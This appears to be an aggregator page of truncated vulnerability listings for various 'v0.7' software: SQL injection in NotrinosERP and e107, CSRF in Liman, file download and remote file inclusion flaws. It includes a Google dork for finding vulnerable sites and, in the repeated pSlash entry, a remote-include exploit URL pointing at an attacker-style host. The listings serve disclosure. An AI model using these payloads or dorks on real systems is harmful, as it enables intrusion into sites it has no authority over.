NotrinosERP vulnerable to SQL Injection

NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customerdelivery.php...

Sql injection

NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customerdelivery.php...

CVE-2023-24788

NotrinosERP v0.7 contains a SQL injection vulnerability exploitable via the OrderNumber parameter in /NotrinosERP/sales/customer_delivery.php. The vulnerability is described as an authenticated, blind (time-based) SQLi on the OrderNumber GET parameter, allowing an attacker with valid session to i...

Liman 0.7 Cross Site Request Forgery

Exploit Title: Liman v0.7 - Cross-Site Request Forgery CSRF Date: 27-03-2018 Exploit Author: George Tsimpidas Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 Version: 0.7 Tested on: 18.04.5 LTS Bionic Beaver Category: Webapp 1. Description:- There is no CSRF protection in...

BlackArch Linux v2018.06.01 - Penetration Testing Distribution

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1981 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. ChangeLog: added more than 60 new tools added confi...

CVE-2015-1000006

Remote file download vulnerability in recent-backups v0.7 wordpress plugin...

CVE-2015-1000006

CVE-2015-1000006 corresponds to a remote file download vulnerability in the WordPress plugin recent-backups v0.7. Connected sources confirm a file‑download flaw in the plugin, with OpenVAS and WPVulnDB noting directory traversal/file download risk and WPEX exploit notes that download-file.php doe...

[ISME v0.7] IP Phone Scanning Made Easy

ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to...

e107 Plugin userjournals_menu - blog.id SQL Injection

e107 Plugin userjournalsmenu - blog.id SQL Injection e107 Plugin userjournalsmenu blog.id SQL injection vulnerability Author : boom3rang Greetz : H!tm@N, KHG, chs, redc00de Vulnerability : Remote SQL-injection Google Dork : inurl:"userjournals.php?blog."...

trevorchan07-rfi.txt

------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script:Trevorchan v0.7 Download: http://rel.trevorchan.org/Releasev07.zip Contact: ilker Kandemir Code: requireonce$tcconfig'rootdir'."/inc/functions.php";...

pslash07.txt

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...